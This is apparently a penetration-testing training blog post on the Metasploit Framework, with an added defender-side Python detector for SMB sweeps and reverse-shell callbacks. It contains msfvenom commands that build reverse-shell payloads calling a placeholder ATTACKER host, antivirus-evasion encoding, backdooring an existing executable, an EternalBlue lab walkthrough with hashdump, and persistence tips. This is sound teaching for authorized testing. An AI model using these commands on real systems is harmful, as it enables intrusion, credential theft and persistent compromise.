A complete Metasploit Framework guide covering msfconsole commands, exploit modules, the Meterpreter shell, payload generation with msfvenom, and advanced exploitation techniques.

Amit Kumar, Ethical Hacker & Founder
6 min read

# Metasploit Framework: From Basics to Advanced Exploitation

## Introduction to Metasploit

The Metasploit Framework is the most widely used exploitation framework in the cybersecurity industry. Originally created by H.D. Moore in 2003 and now maintained by Rapid7, Metasploit gives security professionals a comprehensive platform for vulnerability research, exploit development, and penetration testing.

This guide covers everything from basic msfconsole commands to advanced Meterpreter techniques, so that you can use Metasploit effectively for authorized security testing.

## Understanding Metasploit Architecture

### Core Components

The Framework Core is the foundation that manages modules, sessions, and plugins. Modules are self-contained pieces of code that each perform one specific task. Interfaces include msfconsole, msfgui, and Armitage. Libraries provide shared code for network protocols, encoding, and other common functionality.

### Module Types

  • Exploit modules take advantage of vulnerabilities to gain access to a target
  • Payload modules run after successful exploitation (singles, stagers, stages)
  • Auxiliary modules support scanning, fuzzing, and information gathering
  • Post modules handle post-exploitation tasks such as privilege escalation
  • Encoder modules transform payloads to avoid bad characters and to help with antivirus evasion
  • NOP modules generate no-operation sleds used to pad shellcode so that it executes reliably

## Installing Metasploit

Metasploit comes pre-installed on Kali Linux; start it with `msfconsole`. If it is not installed, update the package lists and install it with `sudo apt update && sudo apt install metasploit-framework`.

Initialize the PostgreSQL database, which enables workspaces, stored scan results, and better session management, with `sudo msfdb init`.

## Mastering msfconsole

### Basic Commands

Use `help` to display help information. Use `search` to find modules, for example `search type:exploit name:smb` or `search cve:2017-0144`. Use `info` to display a module's description and options. Use `show options` to list the options of the current module. Use `exploit` (or its alias `run`) to launch the selected module.

### Database Integration Commands

Use `workspace -a pentest` to create a workspace named pentest. Use `db_nmap -sV -p- 192.168.1.0/24` to scan targets with Nmap and store the results in the database. Use `hosts` to view discovered hosts and `services` to view discovered services.

### Session Management

Use `sessions` to list active sessions. Use `sessions -i 1` to interact with session 1. Use `background` to return the active session to the background without closing it.

## Working with Exploit Modules

### Finding the Right Exploit

Search exploits by keyword, CVE number, or platform:

  • `search type:exploit name:buffer overflow`
  • `search cve:2021-44228`
  • `search platform:windows`

### Configuring Exploit Options

Set the required options such as `RHOSTS`, `RPORT`, `LHOST`, and `LPORT`. Use `show targets` to list the supported targets and `set TARGET` to choose a specific one.

## Payload Configuration

### Understanding Payload Types

Singles (inline payloads) are self-contained and need no further download. Stagers are small payloads that establish the connection and then download the next stage. Stages are delivered by the stager and provide the advanced functionality, Meterpreter being the best-known example.

### Common Payloads

  • `windows/x64/meterpreter/reverse_tcp`: Windows x64 Meterpreter over reverse TCP
  • `linux/x86/meterpreter/reverse_tcp`: Linux x86 Meterpreter over reverse TCP
  • `php/meterpreter/reverse_tcp`: PHP Meterpreter
  • `java/meterpreter/reverse_tcp`: staged Meterpreter for Java

## Meterpreter: Advanced Post-Exploitation

Meterpreter runs in the memory of the exploited process and provides extensive post-exploitation functionality with stealth features.

### Core Meterpreter Commands

Use `sysinfo` for system information. Use `getuid` to display the current user. Use `ps` to list running processes. Use `migrate PID` to move Meterpreter into a different process. Use `shell` for an interactive command shell. Use `hashdump` to dump password hashes.

### File System Operations

Use `download` to retrieve files from the target and `upload` to send files to it. Use `pwd` and `ls` to show and list the current directory, and `cd` to change directory.

### Privilege Escalation

Use `getsystem` to attempt automatic privilege escalation. Use `getprivs` to check the privileges available to the current token. Use `migrate` to move into a process that runs with higher privileges.

## Msfvenom: Standalone Payload Generation

Msfvenom generates standalone payloads outside msfconsole, in a variety of output formats, for delivery by other means.

### Basic Payload Generation

  • Windows executable: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe`
  • Linux ELF binary: `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf`
  • PHP payload: `msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.php`

### Advanced Msfvenom Options

Run the payload through five iterations of an encoder with `msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe`. Use an existing executable as a template, keeping its original behaviour, with `msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER -x calc.exe -k -f exe -o payload.exe`.

### Handler Configuration

Payloads generated with msfvenom need a listener: use `exploit/multi/handler` with the matching `PAYLOAD`, `LHOST`, and `LPORT` settings. Use `set ExitOnSession false` so the handler keeps listening after the first session, and `exploit -j` to run it as a background job.

## Practical Exploitation Walkthrough

### Scenario: Exploiting Windows SMB (EternalBlue)

Lab setup: Kali Linux as the attacker (192.168.1.50) and a Windows 7 target (192.168.1.100) on the same network segment.

Step 1: Scan the network with `db_nmap -sS -sV -p 445 192.168.1.0/24` to find systems exposing the SMB service.

Step 2: Search for the exploit with `search type:exploit name:ms17-010`.

Step 3: Configure the exploit with `use exploit/windows/smb/ms17_010_eternalblue`, then `set RHOSTS`, `set PAYLOAD`, `set LHOST`, and `set LPORT`.

Step 4: Execute with `exploit`.

Step 5: Post-exploitation using Meterpreter commands such as `sysinfo`, `getuid`, `hashdump`, and `shell`.
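From the defender's side, the walkthrough above leaves a recognisable footprint in connection logs: one host touching port 445 on many neighbours, then a swept host connecting back to that same scanner on the handler's port. The following detection is an added example, not code from the original article; it assumes a simple constructed "ts src dst dport" flow-log format and the lab addresses from the scenario.

```python
"""Defender-side detection for the network footprint of the walkthrough above:
a port-445 sweep followed by a reverse_tcp callback from a swept host."""
from collections import defaultdict
# Constructed flow records in the form "ts src dst dport" (ts in epoch seconds).
# 192.168.1.50 sweeps port 445, then 192.168.1.100 connects back to it on 4444.
SAMPLE_LOG = """\
100 192.168.1.50 192.168.1.10 445
101 192.168.1.50 192.168.1.11 445
102 192.168.1.50 192.168.1.12 445
103 192.168.1.50 192.168.1.13 445
104 192.168.1.50 192.168.1.100 445
150 192.168.1.20 192.168.1.5 443
200 192.168.1.50 192.168.1.100 445
203 192.168.1.100 192.168.1.50 4444
"""

def parse(text):
    """Turn the log text into (ts, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, dport = line.split()
        flows.append((int(ts), src, dst, int(dport)))
    return flows

def find_sweeps(flows, port=445, min_hosts=5, window=60):
    """Map each source that hits >= min_hosts distinct hosts on `port`
    within `window` seconds to the set of hosts it touched."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == port:
            by_src[src].append((ts, dst))
    sweeps = {}
    for src, hits in by_src.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            targets = {d for t, d in hits[i:] if t - t0 <= window}
            if len(targets) >= min_hosts:
                sweeps[src] = targets
                break
    return sweeps

def find_callbacks(flows, sweeps, port=445, max_delay=300):
    """Flag a swept host opening a connection back to the scanner within
    max_delay seconds of an inbound hit on `port`: the reverse_tcp pattern."""
    inbound = {}  # (scanner, victim) -> timestamp of last inbound hit
    alerts = []
    for ts, src, dst, dport in sorted(flows):
        if src in sweeps and dport == port:
            inbound[(src, dst)] = ts
        elif dst in sweeps and (dst, src) in inbound:
            if ts - inbound[(dst, src)] <= max_delay:
                alerts.append((src, dst, dport))
    return alerts
```

The thresholds are deliberately low to fit the small sample; on real flow data tune `min_hosts` and `window` to the subnet size and scan speed you expect.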

## Best Practices for Metasploit Usage

  • Always work within the authorized scope
  • Document all actions for reporting
  • Use the database and workspaces to keep data organized
  • Test exploits in a lab environment first
  • Understand a payload before deploying it
  • Stay up to date with new modules
  • Combine Metasploit with manual techniques for comprehensive testing

## Frequently Asked Questions

### How do I start Metasploit on Kali Linux?

Run `msfconsole` in a terminal. If you use the database, make sure PostgreSQL is initialized and running with `sudo msfdb init` before starting.

### What is the difference between Meterpreter and regular payloads?

Meterpreter runs in memory, provides extensive post-exploitation capabilities, and can be extended with scripts and modules. Regular command shells are simpler but less powerful.

### How do I create a persistent backdoor?

Use the Meterpreter persistence script: `run persistence -h` shows its options. Alternatively, create a scheduled task for persistence after compromise.

### Can Metasploit evade antivirus?

Metasploit payloads can be encoded and obfuscated, but dedicated antivirus solutions often detect them anyway. Advanced evasion requires custom development or frameworks such as Veil-Evasion.

### How do I handle NAT environments?

Use reverse payloads, which connect from the target back to your attacker machine. Make sure the attacker IP is reachable from the target network.

## Conclusion

The Metasploit Framework is an indispensable tool for ethical hackers and penetration testers. This comprehensive guide has covered everything from basic msfconsole commands to advanced exploitation techniques.

Mastering Metasploit requires practice. Work through vulnerable lab environments like Metasploitable and DVWA to build hands-on experience with different exploit scenarios.

Remember that powerful tools come with responsibility. Always work within authorized boundaries, document your activities thoroughly, and use your skills to improve organizational security.

Cyber Defence offers extensive Metasploit training as part of our comprehensive ethical hacking courses. Learn exploitation techniques through practical labs and real-world scenarios.

Start building your Metasploit expertise today. Your journey to becoming a skilled penetration tester begins here.
